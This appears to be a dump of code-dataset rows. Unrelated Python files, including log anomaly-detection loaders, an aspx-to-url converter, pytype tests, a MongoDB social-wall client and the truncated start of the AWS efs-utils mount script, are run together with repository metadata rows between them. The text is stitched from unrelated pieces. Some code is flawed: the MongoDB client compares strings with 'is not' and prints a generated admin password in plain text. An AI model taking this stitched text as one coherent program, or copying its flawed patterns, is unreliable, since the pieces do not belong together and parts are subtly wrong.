pre_df = pd.read_csv(file_path, nrows=1, header=None, delimiter=r'\s+')
columns = pre_df.columns.tolist()
# remove the last column of block name
use_cols = columns[:-1]
data_df = pd.read_csv(file_path, delimiter=r'\s+', header=None, usecols =use_cols, dtype =int)
raw_data = data_df.as_matrix()
# load lables
label_df = pd.read_csv(label_path, delimiter=r'\s+', header=None, usecols = [0], dtype =int) # usecols must be a list
label_data = label_df.as_matrix()
print("The raw data shape is {} and label shape is {}".format(raw_data.shape, label_data.shape))
assert raw_data.shape[0] == label_data.shape[0]
print('The number of anomaly instances is %d' % sum(label_data))
return raw_data, label_data
def bgl_data_loader(para):
""" load the logs and the log_event_mapping from the file path.
Args:
--------
para: the parameters dictionary
Returns:
--------
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
"""
file_path = para['path'] + para['log_file_name']
event_mapping_path = para['path'] + para['log_event_mapping']
# load data
data_df = pd.read_csv(file_path, delimiter=r'\s+', header=None, names = ['label','time'], usecols = para['select_column']) #, parse_dates = [1], date_parser=dateparse)
# convert to date time format
data_df['time'] = pd.to_datetime(data_df['time'], format="%Y-%m-%d-%H.%M.%S.%f")
# calculate the time interval since the start time
data_df['seconds_since'] = (data_df['time']-data_df['time'][0]).dt.total_seconds().astype(int)
# get the label for each log
data_df['label'] = (data_df['label'] != '-').astype(int)
raw_data = data_df[['label','seconds_since']].as_matrix()
# load the event mapping list
event_mapping = pd.read_csv(event_mapping_path, delimiter=r'\s+', header=None, usecols = [0], dtype =int)
event_mapping_data = event_mapping.as_matrix()
print("The raw data shape is {} and label shape is {}".format(raw_data.shape, event_mapping_data.shape))
assert raw_data.shape[0] == event_mapping_data.shape[0]
print('The number of anomaly logs is %d, but it requires further processing' % sum(raw_data[:, 0]))
return raw_data, event_mapping_data
def bgl_preprocess_data(para, raw_data, event_mapping_data):
""" split logs into sliding windows, built an event count matrix and get the corresponding label
Args:
--------
para: the parameters dictionary
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
Returns:
--------
event_count_matrix: event count matrix, where each row is an instance (log sequence vector)
labels: a list of labels, 1 represents anomaly
"""
# create the directory for saving the sliding windows (start_index, end_index), which can be directly loaded in future running
if not os.path.exists(para['save_path']):
os.mkdir(para['save_path'])
log_size = raw_data.shape[0]
sliding_file_path = para['save_path']+'sliding_'+str(para['window_size'])+'h_'+str(para['step_size'])+'h.csv'
#=================divide into sliding windows=============#
start_end_index_list = [] # list of tuples, tuple contains two number, which represent the start and end of sliding time window
label_data, time_data = raw_data[:,0], raw_data[:, 1]
if not os.path.exists(sliding_file_path):
# split into sliding window
start_time = time_data[0]
start_index = 0
end_index = 0
# get the first start, end index, end time
for cur_time in time_data:
if cur_time < start_time + para['window_size']*3600:
end_index += 1
end_time = cur_time
else:
start_end_pair=tuple((start_index,end_index))
start_end_index_list.append(start_end_pair)
break
# move the start and end index until next sliding window
while end_index < log_size:
start_time = start_time + para['step_size']*3600
end_time = end_time + para['step_size']*3600
for i in range(start_index,end_index):
if time_data[i] < start_time:
i+=1
else:
break
for j in range(end_index, log_size):
if time_data[j] < end_time:
j+=1
else:
break
start_index = i
end_index = j
start_end_pair = tuple((start_index, end_index))
start_end_index_list.append(start_end_pair)
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset\n'%inst_number)
np.savetxt(sliding_file_path,start_end_index_list,delimiter=',',fmt='%d')
else:
print('Loading start_end_index_list from file')
start_end_index_list = pd.read_csv(sliding_file_path, header=None).as_matrix()
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset' % inst_number)
# get all the log indexes in each time window by ranging from start_index to end_index
expanded_indexes_list=[]
for t in range(inst_number):
index_list = []
expanded_indexes_list.append(index_list)
for i in range(inst_number):
start_index = start_end_index_list[i][0]
end_index = start_end_index_list[i][1]
for l in range(start_index, end_index):
expanded_indexes_list[i].append(l)
event_mapping_data = [row[0] for row in event_mapping_data]
event_num = len(list(set(event_mapping_data)))
print('There are %d log events'%event_num)
#=================get labels and event count of each sliding window =============#
labels = []
event_count_matrix = np.zeros((inst_number,event_num))
for j in range(inst_number):
label = 0 #0 represent success, 1 represent failure
for k in expanded_indexes_list[j]:
event_index = event_mapping_data[k]
event_count_matrix[j, event_index] += 1
if label_data[k]:
label = 1
continue
labels.append(label)
assert inst_number == len(labels)
print("Among all instances, %d are anomalies"%sum(labels))
assert event_count_matrix.shape[0] == len(labels)
return event_count_matrix, labels
def deepia_data_loader(para):
""" load the logs and the log_event_mapping from the file path.
Args:
--------
para: the parameters dictionary
Returns:
--------
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
"""
file_path = para['path'] + para['log_file_name']
event_mapping_path = para['path'] + para['log_event_mapping']
# load data
data_df = pd.read_csv(file_path, delimiter=r'\s+', header=None, names=['month', 'day', 'hour'],
usecols=para['select_column']) # , parse_dates = [1], date_parser=dateparse)
# convert to date time format
data_df = data_df[['month', 'day', 'hour']].apply(lambda x: list(map(str, x)))
data_df['time'] = data_df[['month', 'day', 'hour']].apply(lambda x: '-'.join(x), axis=1) #
data_df['time'] = pd.to_datetime(data_df['time'], format="%b-%d-%H:%M:%S")
# calculate the time interval since the start time
data_df['seconds_since'] = (data_df['time'] - data_df['time'][0]).dt.total_seconds().astype(int)
# get the label for each log
# data_df['label'] = (data_df['label'] != '-').astype(int)
raw_data = data_df[['seconds_since']].as_matrix()
# load the event mapping list
event_mapping = pd.read_csv(event_mapping_path, delimiter=r'\s+', header=None, usecols = [0], dtype =int)
event_mapping_data = event_mapping.as_matrix()
print("The raw data shape is {} and label shape is {}".format(raw_data.shape, event_mapping_data.shape))
assert raw_data.shape[0] == event_mapping_data.shape[0]
#print('The number of anomaly logs is %d, but it requires further processing' % sum(raw_data[:, 0]))
return raw_data, event_mapping_data
def deepia_preprocess_data(para, raw_data, event_mapping_data):
""" split logs into sliding windows, built an event count matrix and get the corresponding label
Args:
--------
para: the parameters dictionary
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
Returns:
--------
event_count_matrix: event count matrix, where each row is an instance (log sequence vector)
labels: a list of labels, 1 represents anomaly
"""
# create the directory for saving the sliding windows (start_index, end_index), which can be directly loaded in future running
if not os.path.exists(para['save_path']):
os.mkdir(para['save_path'])
log_size = raw_data.shape[0]
sliding_file_path = para['save_path']+'sliding_'+str(para['window_size'])+'h_'+str(para['step_size'])+'h.csv'
#=================divide into sliding windows=============#
start_end_index_list = [] # list of tuples, tuple contains two number, which represent the start and end of sliding time window
time_data = raw_data[:,0]
if not os.path.exists(sliding_file_path):
# split into sliding window
start_time = time_data[0]
start_index = 0
end_index = 0
# get the first start, end index, end time
for cur_time in time_data:
if cur_time < start_time + para['window_size']*3600:
end_index += 1
end_time = cur_time
else:
start_end_pair=tuple((start_index,end_index))
start_end_index_list.append(start_end_pair)
break
# move the start and end index until next sliding window
while end_index < log_size:
start_time = start_time + para['step_size']*3600
end_time = end_time + para['step_size']*3600
for i in range(start_index,end_index):
if time_data[i] < start_time:
i+=1
else:
break
for j in range(end_index, log_size):
if time_data[j] < end_time:
j+=1
else:
break
start_index = i
end_index = j
start_end_pair = tuple((start_index, end_index))
start_end_index_list.append(start_end_pair)
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset\n'%inst_number)
np.savetxt(sliding_file_path,start_end_index_list,delimiter=',',fmt='%d')
else:
print('Loading start_end_index_list from file')
start_end_index_list = pd.read_csv(sliding_file_path, header=None).as_matrix()
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset' % inst_number)
# get all the log indexes in each time window by ranging from start_index to end_index
expanded_indexes_list=[]
for t in range(inst_number):
index_list = []
expanded_indexes_list.append(index_list)
for i in range(inst_number):
start_index = start_end_index_list[i][0]
end_index = start_end_index_list[i][1]
for l in range(start_index, end_index):
expanded_indexes_list[i].append(l)
event_mapping_data = [row[0] for row in event_mapping_data]
event_num = len(list(set(event_mapping_data)))
print('There are %d log events'%event_num)
#=================get labels and event count of each sliding window =============#
event_count_matrix = np.zeros((inst_number,event_num))
for j in range(inst_number):
for k in expanded_indexes_list[j]:
event_index = event_mapping_data[k]
event_count_matrix[j, event_index] += 1
#print("Among all instances, %d are anomalies"%sum(labels))
return event_count_matrix
| 38.877966 | 168 | 0.717674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,932 | 0.430029 |
6a00c6e63b457a75c0424a247757123821cb24fb | 1,230 | py | Python | aspx2url/aspx2url.py | marcocucinato/aspx2url | 985a0e51865bb7be15618155ff9844730c2eaaf6 | [
"MIT"
] | null | null | null | aspx2url/aspx2url.py | marcocucinato/aspx2url | 985a0e51865bb7be15618155ff9844730c2eaaf6 | [
"MIT"
] | null | null | null | aspx2url/aspx2url.py | marcocucinato/aspx2url | 985a0e51865bb7be15618155ff9844730c2eaaf6 | [
"MIT"
] | null | null | null | from __future__ import print_function
import re, sys, glob, getopt, os
def usage():
print('aspx2url v1.0')
print('Usage:')
print(sys.argv[0]+' -d -h filename(s)')
print('-d : Delete original file')
print('-h : This help')
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "hd")
except getopt.GetoptError as err:
print(str(err))
usage()
sys.exit(2)
deleteOriginal = False
for option,value in opts:
if option == '-h':
usage()
sys.exit()
elif option == '-d':
deleteOriginal = True
for origFilename in args:
with open(origFilename, "r") as f:
html_doc = f.read()
prog = re.compile('\<mso\:URL.*?\>(.*?),.*?\<\/mso\:URL\>', re.M)
result = prog.search(html_doc)
url = result.group(1);
filename = re.search('(.*?)\.aspx',origFilename).group(1)
fullFilename = filename+'.url'
with open(fullFilename, 'w') as out:
out.write('[InternetShortcut]\n')
out.write('URL='+url)
out.write('\n')
if deleteOriginal:
os.remove(origFilename)
if __name__ == '__main__':
main()
| 29.285714 | 77 | 0.530081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 205 | 0.166667 |
6a00d6b8c83e85268bd294d4e512d54f000cfc8a | 2,843 | py | Python | pytype/tests/py2/test_stdlib.py | souravbadami/pytype | 804fa97e7f9208df2711976085a96f756b3949e6 | [
"Apache-2.0"
] | 1 | 2020-04-20T02:55:21.000Z | 2020-04-20T02:55:21.000Z | pytype/tests/py2/test_stdlib.py | doc22940/pytype | 4772ad6fe89f4df75ae3d08e7374f68074175d4a | [
"Apache-2.0"
] | null | null | null | pytype/tests/py2/test_stdlib.py | doc22940/pytype | 4772ad6fe89f4df75ae3d08e7374f68074175d4a | [
"Apache-2.0"
] | null | null | null | """Tests of selected stdlib functions."""
from pytype.tests import test_base
class StdlibTests(test_base.TargetPython27FeatureTest):
"""Tests for files in typeshed/stdlib."""
def testPosix(self):
ty = self.Infer("""
import posix
x = posix.urandom(10)
""")
self.assertTypesMatchPytd(ty, """
posix = ... # type: module
x = ... # type: str
""")
def testXRange(self):
self.Check("""
import random
random.sample(xrange(10), 5)
""")
def testStringTypes(self):
ty = self.Infer("""
import types
if isinstance("", types.StringTypes):
x = 42
if isinstance(False, types.StringTypes):
y = 42
if isinstance(u"", types.StringTypes):
z = 42
""", deep=False)
self.assertTypesMatchPytd(ty, """
types = ... # type: module
x = ... # type: int
z = ... # type: int
""")
def testDefaultDict(self):
self.Check("""
import collections
import itertools
ids = collections.defaultdict(itertools.count(17).next)
""")
def testSysVersionInfoLt(self):
ty = self.Infer("""
import sys
if sys.version_info[0] < 3:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: int
""")
def testSysVersionInfoLe(self):
ty = self.Infer("""
import sys
if sys.version_info[0] <= 2:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: int
""")
def testSysVersionInfoEq(self):
ty = self.Infer("""
import sys
if sys.version_info[0] == 2:
v = 42
elif sys.version_info[0] == 3:
v = "hello world"
else:
v = None
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: int
""")
def testSysVersionInfoGe(self):
ty = self.Infer("""
import sys
if sys.version_info[0] >= 3:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: str
""")
def testSysVersionInfoGt(self):
ty = self.Infer("""
import sys
if sys.version_info[0] > 2:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: str
""")
def testSysVersionInfoNamedAttribute(self):
ty = self.Infer("""
import sys
if sys.version_info.major == 2:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys: module
v: int
""")
test_base.main(globals(), __name__ == "__main__")
| 21.869231 | 61 | 0.518115 | 2,710 | 0.953218 | 0 | 0 | 0 | 0 | 0 | 0 | 1,862 | 0.654942 |
6a00f01d33da6c470fd1f865044516a818d9c018 | 88 | py | Python | smmips/__init__.py | oicr-gsi/pysmmips | ccf209b13862a5533a11fbe02e80d3265ccef313 | [
"MIT"
] | null | null | null | smmips/__init__.py | oicr-gsi/pysmmips | ccf209b13862a5533a11fbe02e80d3265ccef313 | [
"MIT"
] | null | null | null | smmips/__init__.py | oicr-gsi/pysmmips | ccf209b13862a5533a11fbe02e80d3265ccef313 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 20 16:04:52 2020
@author: rjovelin
"""
| 11 | 35 | 0.579545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.965909 |
6a00f65f8d9c6385beccc2cbd3c37ef660b0dc52 | 6,343 | py | Python | tarentsocialwall/MongoDBClient.py | tarent/socialwall-backend | 2f09b8ccdd62a15daaa281d6ff568cb6ef749ab6 | [
"MIT"
] | null | null | null | tarentsocialwall/MongoDBClient.py | tarent/socialwall-backend | 2f09b8ccdd62a15daaa281d6ff568cb6ef749ab6 | [
"MIT"
] | null | null | null | tarentsocialwall/MongoDBClient.py | tarent/socialwall-backend | 2f09b8ccdd62a15daaa281d6ff568cb6ef749ab6 | [
"MIT"
] | 2 | 2019-08-06T14:14:44.000Z | 2019-08-06T14:21:19.000Z | import random
from datetime import datetime
from passlib.handlers.sha2_crypt import sha256_crypt
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure
from tarentsocialwall.SocialPost import SocialPost
from tarentsocialwall.User import User
from tarentsocialwall.Util import Util
class MongoDBClient:
__instance = None
@staticmethod
def getInstance():
""" Static access method. """
if MongoDBClient.__instance == None:
MongoDBClient()
client = None
db = None
random_social_post_list = None
reset_counter = None
def __init__(self, uri):
# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string
self.client = MongoClient(uri)
self.db = self.client.socialPosts
try:
# The ismaster command is cheap and does not require auth.
self.client.admin.command('ismaster')
except ConnectionFailure:
print("Server not available")
if MongoDBClient.__instance != None:
raise Exception("This class is a singleton!")
else:
MongoDBClient.__instance = self
self.update_all_socialposts()
# write social_post into mongo
def write_social_post(self, social_post: SocialPost):
existing_dict = None
try:
existing_dict = self.db.socialPosts.find_one({'externalId': social_post.externalId})
except Exception as ex:
print(ex)
existing_dict = None
if existing_dict is None:
self.db.socialPosts.insert_one(social_post.__dict__)
else:
update_identifier = {'externalId': social_post.externalId, 'source': social_post.source}
self.db.socialPosts.replace_one(update_identifier, social_post.__dict__)
return 0
# read random social_post from list
def get_random_social_post(self) -> SocialPost:
if len(self.random_social_post_list) == 0:
return None
else:
if self.reset_counter >= len(self.random_social_post_list):
# when we went through all posts once we reset counter and shuffle list
# so we dont repeat the same circle of posts every time
self.reset_counter = 0
random.shuffle(self.random_social_post_list)
post = self.random_social_post_list[self.reset_counter]
self.reset_counter = self.reset_counter + 1
print(post)
if post is None:
return None
social_post = SocialPost()
social_post.set_dictionary(post)
return social_post
# read custom social_post from mongo
def get_custom_social_post(self):
doc = list(self.db.socialPosts.aggregate([{'$match': {'source': 'custom post'}}]))
print(list(doc))
if doc is None:
return None
social_post_list = []
for post in doc:
custom_post_item = SocialPost()
custom_post_item.set_dictionary(post)
social_post_list.append(custom_post_item)
return social_post_list
def delete_post(self, external_id):
removed = self.db.socialPosts.delete_one({'externalId': external_id})
print(removed)
def write_access_token(self, access_token, source):
existing_dict = self.db.storeAccessToken.find_one({'source': access_token})
if existing_dict is None:
identifier = {'access_token': access_token, 'source': source}
self.db.storeAccessToken.insert_one(identifier)
else:
update_identifier = {'access_token': access_token, 'source': source}
self.db.storeAccessToken.replace_one(update_identifier, access_token)
return 0
def read_access_token(self, source):
existing_dict = self.db.storeAccessToken.find_one({'source': source})
return existing_dict
def get_google_calendar_posts(self):
timestamp_var = datetime.utcnow().timestamp()
doc = list(self.db.socialPosts.aggregate([
{'$match': {'validFrom': {'$lte': timestamp_var},
'validTo': {'$gte': timestamp_var},
'source': 'Google calendar'}},
{'$sort': {'start': 1}}
]))
if doc is None:
return None
social_post_list = []
for post in doc:
custom_post_item = SocialPost()
custom_post_item.set_dictionary(post)
social_post_list.append(custom_post_item)
return social_post_list
def get_users(self):
users_db = list(self.db.socialwall_users.find())
if users_db is None:
return None
users = []
for item in users_db:
if item['username'] is not 'admin':
user = User()
user.set_dictionary(item)
users.append(user)
return users
def read_user(self, username):
return self.db.socialwall_users.find_one({'username': username})
def write_user(self, user: User):
username_dict = self.db.socialwall_users.find_one({'username': user.username})
if username_dict is None:
self.db.socialwall_users.insert_one(user.__dict__)
else:
update_identifier = {'username': user.username}
self.db.socialwall_users.replace_one(update_identifier, user.__dict__)
return 0
def delete_user(self, user: User):
self.db.socialwall_users.delete_one({'username': user['username']})
def init_admin(self):
random_string = Util.randomString()
user = User()
user.username = 'admin'
user.password = sha256_crypt.hash(random_string)
print("Admin password is '%s'" % random_string)
user.firstname = 'admin'
user.lastname = 'admin'
self.write_user(user)
#Get all valid social posts from db and shuffle them in random order
def update_all_socialposts(self):
timestamp = datetime.utcnow().timestamp()
self.random_social_post_list = list(self.db.socialPosts.aggregate(
[{'$match': {'validFrom': {'$lte': timestamp}, 'validTo': {'$gte': timestamp}}}]))
random.shuffle(self.random_social_post_list)
self.reset_counter = 0
| 33.036458 | 100 | 0.631405 | 6,035 | 0.951443 | 0 | 0 | 147 | 0.023175 | 0 | 0 | 894 | 0.140943 |
6a0102385be6299942545100e581de23300db9a4 | 76,697 | py | Python | src/mount_efs/__init__.py | Sodki/efs-utils | 493d9ea0dde93b560519b184219f6f71e32a8fcf | [
"MIT"
] | null | null | null | src/mount_efs/__init__.py | Sodki/efs-utils | 493d9ea0dde93b560519b184219f6f71e32a8fcf | [
"MIT"
] | null | null | null | src/mount_efs/__init__.py | Sodki/efs-utils | 493d9ea0dde93b560519b184219f6f71e32a8fcf | [
"MIT"
] | 12 | 2020-10-22T03:47:51.000Z | 2022-03-19T18:09:59.000Z | #!/usr/bin/env python
#
# Copyright 2017-2018 Amazon.com, Inc. and its affiliates. All Rights Reserved.
#
# Licensed under the MIT License. See the LICENSE accompanying this file
# for the specific language governing permissions and limitations under
# the License.
#
#
# Copy this script to /sbin/mount.efs and make sure it is executable.
#
# You will be able to mount an EFS file system by its short name, by adding it
# to /etc/fstab. The syntax of an fstab entry is:
#
# [Device] [Mount Point] [File System Type] [Options] [Dump] [Pass]
#
# Add an entry like this:
#
# fs-deadbeef /mount_point efs _netdev 0 0
#
# Using the 'efs' type will cause '/sbin/mount.efs' to be called by 'mount -a'
# for this file system. The '_netdev' option tells the init system that the
# 'efs' type is a networked file system type. This has been tested with systemd
# (Amazon Linux 2, CentOS 7, RHEL 7, Debian 9, and Ubuntu 16.04), and upstart
# (Amazon Linux 2017.09).
#
# Once there is an entry in fstab, the file system can be mounted with:
#
# sudo mount /mount_point
#
# The script will add recommended mount options, if not provided in fstab.
import base64
import errno
import hashlib
import hmac
import json
import logging
import os
import pwd
import random
import re
import socket
import subprocess
import sys
import threading
import time
from contextlib import contextmanager
from datetime import datetime, timedelta
from logging.handlers import RotatingFileHandler
try:
import ConfigParser
from ConfigParser import NoOptionError, NoSectionError
except ImportError:
from configparser import ConfigParser, NoOptionError, NoSectionError
try:
from urllib.parse import quote_plus
except ImportError:
from urllib import quote_plus
try:
from urllib2 import URLError, HTTPError, build_opener, urlopen, Request, HTTPHandler
from urllib import urlencode
except ImportError:
from urllib.request import urlopen, Request
from urllib.error import URLError, HTTPError
from urllib.parse import urlencode
try:
import botocore.session
from botocore.exceptions import ClientError, NoCredentialsError, EndpointConnectionError
BOTOCORE_PRESENT = True
except ImportError:
BOTOCORE_PRESENT = False
VERSION = '1.28.2'
SERVICE = 'elasticfilesystem'
CONFIG_FILE = '/etc/amazon/efs/efs-utils.conf'
CONFIG_SECTION = 'mount'
CLIENT_INFO_SECTION = 'client-info'
CLIENT_SOURCE_STR_LEN_LIMIT = 100
CLOUDWATCH_LOG_SECTION = 'cloudwatch-log'
DEFAULT_CLOUDWATCH_LOG_GROUP = '/aws/efs/utils'
DEFAULT_RETENTION_DAYS = 14
# Cloudwatchlog agent dict includes cloudwatchlog botocore client, cloudwatchlog group name, cloudwatchlog stream name
CLOUDWATCHLOG_AGENT = None
LOG_DIR = '/var/log/amazon/efs'
LOG_FILE = 'mount.log'
STATE_FILE_DIR = '/var/run/efs'
PRIVATE_KEY_FILE = '/etc/amazon/efs/privateKey.pem'
DATE_ONLY_FORMAT = '%Y%m%d'
SIGV4_DATETIME_FORMAT = '%Y%m%dT%H%M%SZ'
CERT_DATETIME_FORMAT = '%y%m%d%H%M%SZ'
AWS_CREDENTIALS_FILE = os.path.expanduser(os.path.join('~' + pwd.getpwuid(os.getuid()).pw_name, '.aws', 'credentials'))
AWS_CONFIG_FILE = os.path.expanduser(os.path.join('~' + pwd.getpwuid(os.getuid()).pw_name, '.aws', 'config'))
CA_CONFIG_BODY = """dir = %s
RANDFILE = $dir/database/.rand
[ ca ]
default_ca = local_ca
[ local_ca ]
database = $dir/database/index.txt
serial = $dir/database/serial
private_key = %s
cert = $dir/certificate.pem
new_certs_dir = $dir/certs
default_md = sha256
preserve = no
policy = efsPolicy
x509_extensions = v3_ca
[ efsPolicy ]
CN = supplied
[ req ]
prompt = no
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
CN = %s
%s
%s
%s
"""
# SigV4 Auth
ALGORITHM = 'AWS4-HMAC-SHA256'
AWS4_REQUEST = 'aws4_request'
HTTP_REQUEST_METHOD = 'GET'
CANONICAL_URI = '/'
CANONICAL_HEADERS_DICT = {
'host': '%s'
}
CANONICAL_HEADERS = '\n'.join(['%s:%s' % (k, v) for k, v in sorted(CANONICAL_HEADERS_DICT.items())])
SIGNED_HEADERS = ';'.join(CANONICAL_HEADERS_DICT.keys())
REQUEST_PAYLOAD = ''
FS_ID_RE = re.compile('^(?P<fs_id>fs-[0-9a-f]+)$')
EFS_FQDN_RE = re.compile(r'^(?P<fs_id>fs-[0-9a-f]+)\.efs\.(?P<region>[a-z0-9-]+)\.(?P<dns_name_suffix>[a-z0-9.]+)$')
AP_ID_RE = re.compile('^fsap-[0-9a-f]{17}$')
CREDENTIALS_KEYS = ['AccessKeyId', 'SecretAccessKey', 'Token']
ECS_URI_ENV = 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
ECS_TASK_METADATA_API = 'http://169.254.170.2'
WEB_IDENTITY_ROLE_ARN_ENV = 'AWS_ROLE_ARN'
WEB_IDENTITY_TOKEN_FILE_ENV = 'AWS_WEB_IDENTITY_TOKEN_FILE'
STS_ENDPOINT_URL = 'https://sts.amazonaws.com/'
INSTANCE_METADATA_TOKEN_URL = 'http://169.254.169.254/latest/api/token'
INSTANCE_METADATA_SERVICE_URL = 'http://169.254.169.254/latest/dynamic/instance-identity/document/'
INSTANCE_IAM_URL = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
SECURITY_CREDS_ECS_URI_HELP_URL = 'https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html'
SECURITY_CREDS_WEBIDENTITY_HELP_URL = 'https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html'
SECURITY_CREDS_IAM_ROLE_HELP_URL = 'https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html'
DEFAULT_STUNNEL_VERIFY_LEVEL = 2
DEFAULT_STUNNEL_CAFILE = '/etc/amazon/efs/efs-utils.crt'
NOT_BEFORE_MINS = 15
NOT_AFTER_HOURS = 3
EFS_ONLY_OPTIONS = [
'accesspoint',
'awscredsuri',
'awsprofile',
'cafile',
'iam',
'netns',
'noocsp',
'ocsp',
'tls',
'tlsport',
'verify'
]
UNSUPPORTED_OPTIONS = [
'capath'
]
STUNNEL_GLOBAL_CONFIG = {
'fips': 'no',
'foreground': 'yes',
'socket': [
'l:SO_REUSEADDR=yes',
'a:SO_BINDTODEVICE=lo',
],
}
STUNNEL_EFS_CONFIG = {
'client': 'yes',
'accept': '127.0.0.1:%s',
'connect': '%s:2049',
'sslVersion': 'TLSv1.2',
'renegotiation': 'no',
'TIMEOUTbusy': '20',
'TIMEOUTclose': '0',
'TIMEOUTidle': '70',
'delay': 'yes',
}
WATCHDOG_SERVICE = 'amazon-efs-mount-watchdog'
SYSTEM_RELEASE_PATH = '/etc/system-release'
OS_RELEASE_PATH = '/etc/os-release'
RHEL8_RELEASE_NAME = 'Red Hat Enterprise Linux release 8'
CENTOS8_RELEASE_NAME = 'CentOS Linux release 8'
FEDORA_RELEASE_NAME = 'Fedora release'
SUSE_RELEASE_NAME = 'openSUSE Leap'
SKIP_NO_LIBWRAP_RELEASES = [RHEL8_RELEASE_NAME, CENTOS8_RELEASE_NAME, FEDORA_RELEASE_NAME, SUSE_RELEASE_NAME]
def fatal_error(user_message, log_message=None, exit_code=1):
if log_message is None:
log_message = user_message
sys.stderr.write('%s\n' % user_message)
logging.error(log_message)
publish_cloudwatch_log(CLOUDWATCHLOG_AGENT, 'Mount failed, %s' % log_message)
sys.exit(exit_code)
def get_target_region(config):
def _fatal_error(message):
fatal_error('Error retrieving region. Please set the "region" parameter in the efs-utils configuration file.', message)
metadata_exception = 'Unknown error'
try:
return config.get(CONFIG_SECTION, 'region')
except NoOptionError:
pass
try:
return get_region_from_instance_metadata()
except Exception as e:
metadata_exception = e
logging.warning('Region not found in config file and metadata service call failed, falling back '
'to legacy "dns_name_format" check')
try:
region = get_region_from_legacy_dns_format(config)
sys.stdout.write('Warning: region obtained from "dns_name_format" field. Please set the "region" '
'parameter in the efs-utils configuration file.')
return region
except Exception:
logging.warning('Legacy check for region in "dns_name_format" failed')
_fatal_error(metadata_exception)
def get_region_from_instance_metadata():
instance_identity = get_instance_identity_info_from_instance_metadata('region')
if not instance_identity:
raise Exception("Cannot retrieve region from instance_metadata")
return instance_identity
def get_instance_identity_info_from_instance_metadata(property):
ec2_metadata_unsuccessful_resp = 'Unsuccessful retrieval of EC2 metadata at %s.' % INSTANCE_METADATA_SERVICE_URL
ec2_metadata_url_error_msg = 'Unable to reach %s to retrieve EC2 instance metadata.' % INSTANCE_METADATA_SERVICE_URL
instance_identity = url_request_helper(INSTANCE_METADATA_SERVICE_URL, ec2_metadata_unsuccessful_resp,
ec2_metadata_url_error_msg, retry_with_new_header_token=True)
if instance_identity:
try:
return instance_identity[property]
except KeyError as e:
logging.warning('%s not present in %s: %s' % (property, instance_identity, e))
except TypeError as e:
logging.warning('response %s is not a json object: %s' % (instance_identity, e))
return None
def get_region_from_legacy_dns_format(config):
"""
For backwards compatibility check dns_name_format to obtain the target region. This functionality
should only be used if region is not present in the config file and metadata calls fail.
"""
dns_name_format = config.get(CONFIG_SECTION, 'dns_name_format')
if '{region}' not in dns_name_format:
split_dns_name_format = dns_name_format.split('.')
if '{dns_name_suffix}' in dns_name_format:
return split_dns_name_format[-2]
elif 'amazonaws.com' in dns_name_format:
return split_dns_name_format[-3]
raise Exception('Region not found in dns_name_format')
def get_aws_ec2_metadata_token():
try:
opener = build_opener(HTTPHandler)
request = Request(INSTANCE_METADATA_TOKEN_URL)
request.add_header('X-aws-ec2-metadata-token-ttl-seconds', 21600)
request.get_method = lambda: 'PUT'
res = opener.open(request)
return res.read()
except NameError:
headers = {'X-aws-ec2-metadata-token-ttl-seconds': 21600}
req = Request(INSTANCE_METADATA_TOKEN_URL, headers=headers, method='PUT')
res = urlopen(req)
return res.read()
def get_aws_security_credentials(use_iam, awsprofile=None, aws_creds_uri=None):
"""
Lookup AWS security credentials (access key ID and secret access key). Adapted credentials provider chain from:
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html and
https://docs.aws.amazon.com/sdk-for-java/v1/developer-guide/credentials.html
"""
if not use_iam:
return None, None
# attempt to lookup AWS security credentials through the credentials URI the ECS agent generated
if aws_creds_uri:
return get_aws_security_credentials_from_ecs(aws_creds_uri, True)
# attempt to lookup AWS security credentials in AWS credentials file (~/.aws/credentials)
# and configs file (~/.aws/config) with given awsprofile
if awsprofile:
return get_aws_security_credentials_from_awsprofile(awsprofile, True)
# attempt to lookup AWS security credentials through AWS_CONTAINER_CREDENTIALS_RELATIVE_URI environment variable
if ECS_URI_ENV in os.environ:
credentials, credentials_source = get_aws_security_credentials_from_ecs(os.environ[ECS_URI_ENV], False)
if credentials and credentials_source:
return credentials, credentials_source
# attempt to lookup AWS security credentials through AssumeRoleWithWebIdentity
# (e.g. for IAM Role for Service Accounts (IRSA) approach on EKS)
if WEB_IDENTITY_ROLE_ARN_ENV in os.environ and WEB_IDENTITY_TOKEN_FILE_ENV in os.environ:
credentials, credentials_source = get_aws_security_credentials_from_webidentity(
os.environ[WEB_IDENTITY_ROLE_ARN_ENV],
os.environ[WEB_IDENTITY_TOKEN_FILE_ENV],
False
)
if credentials and credentials_source:
return credentials, credentials_source
# attempt to lookup AWS security credentials with IAM role name attached to instance
